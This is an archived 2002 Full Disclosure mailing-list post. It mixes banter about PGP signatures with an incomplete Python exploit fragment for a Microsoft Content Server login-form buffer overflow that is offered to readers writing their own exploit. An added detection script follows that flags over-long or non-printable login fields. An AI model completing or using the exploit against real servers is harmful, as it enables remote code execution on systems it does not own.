Full Disclosure mailing list archives

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p


From: full-disclosure () lists netsys com (Dave Aitel)
Date: 14 Aug 2002 17:06:11 -0400


At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

#the method below belongs to the mscsexploit class; the class itself,
#stroverwrite() and the unicodeloop shellcode are not part of this fragment
import sys
import urllib

#returns the sploitstring
    def makesploit(self):
        header=""
        body=""

        body+="NR_DOMAIN=WinNT%3A%2F%2F"
        #1 alignment byte so we are word aligned with the return addr
        attack=""
        attack+="A"
        attack+="\x41\xb9"*4000
        #unicode shellcode!!
        attack=stroverwrite(attack,unicodeloop,1)
        print "length of overflow = "+str(len(attack))
        attack=urllib.quote(attack)
        #print attack

        body+=attack

        body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"

        header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
        header+="Host: "+self.host+"\r\n"
        header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
        header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
        header+="Connection: keep-alive\r\n"
        header+="Content-Type: application/x-www-form-urlencoded\r\n"
        header+="Content-Length: "+str(len(body))+"\r\n"
        header+="\r\n"

        return header+body


#this stuff happens.
if __name__ == '__main__':

    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()

    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))

    if len(sys.argv) > 3:
        app.setSSL(1)

    app.run()


On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> or if you like
>
> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:
> > On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:
> > > Gobbles,
> > >
> > > On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:
> > > > GOBBLES just want to be cool whitehat like everyone else.  Time for new
> > > > leaf time for six figure salary stock option naked breasted assistant.
> > >
> > > Word to that my man! ;)
> > >
> > > peace,
> > > core
> >
> > Your message was signed, but the "GOBBLES" message was not and therefore
> > just a forgery, most likely.
> >
> > BTW:
> > http://www.immunitysec.com/vulnerabilities/
> > They aren't advisories, but if you need something to show to your boss
> > about why you disconnected your Exchange/SQL server from the Internet,
> > it's a good start.
> >
> > Dave Aitel
> > Immunity, Inc
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
> =xfu0
> -----END PGP SIGNATURE-----
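A defender-side check for the request shape that fragment builds, added here as an example and not part of Dave Aitel's post or the Immunity exploit: it parses a raw POST to ManualLoginSubmit.asp, decodes every form field to bytes, and flags values that are far too long for a login field or mostly non-printable. The sample requests, the host name and both thresholds are constructed for this example.

```python
import urllib.parse

# Constructed sample with the shape the exploit fragment produces; the filler
# is much shorter than the real ~8 KB overflow so the example stays small.
SAMPLE_REQUEST = (
    "POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
    "Host: cms.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "NR_DOMAIN=WinNT%3A%2F%2FA" + "A%B9" * 600 +
    "&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASSWORD="
    "&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuestLogin.asp"
)

# Constructed benign login to the same form, for comparison.
BENIGN_REQUEST = (
    "POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
    "Host: cms.example.test\r\n\r\n"
    "NR_DOMAIN=WinNT%3A%2F%2FCORP&NR_USER=alice&NR_PASSWORD=s3cret&submit1=Continue"
)

MAX_FIELD_LEN = 256             # assumed upper bound for any login-form field
MAX_NON_PRINTABLE_RATIO = 0.10  # assumed: real domain/user names are plain ASCII

def parse_form_post(raw):
    """Split a raw HTTP request into (path, {field: decoded bytes})."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    fields = {}
    if method == "POST":
        for pair in body.split("&"):
            name, _, value = pair.partition("=")
            # unquote_to_bytes keeps raw bytes such as 0xB9 rather than
            # replacing them, so the non-printable count below is exact
            fields[urllib.parse.unquote(name)] = urllib.parse.unquote_to_bytes(value)
    return path, fields

def suspicious_fields(raw):
    """Return (path, [(field, reason), ...]) for values that look like overflow payloads."""
    path, fields = parse_form_post(raw)
    findings = []
    for name, value in fields.items():
        if len(value) > MAX_FIELD_LEN:
            findings.append((name, "length %d exceeds %d" % (len(value), MAX_FIELD_LEN)))
        if value:
            odd = sum(1 for b in value if b < 0x20 or b > 0x7E)
            if odd / len(value) > MAX_NON_PRINTABLE_RATIO:
                findings.append((name, "%.0f%% non-printable bytes" % (100.0 * odd / len(value))))
    return path, findings
```

Run over proxy or IIS request captures, the two findings on NR_DOMAIN are what separates the overflow from an ordinary failed login to the same page.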


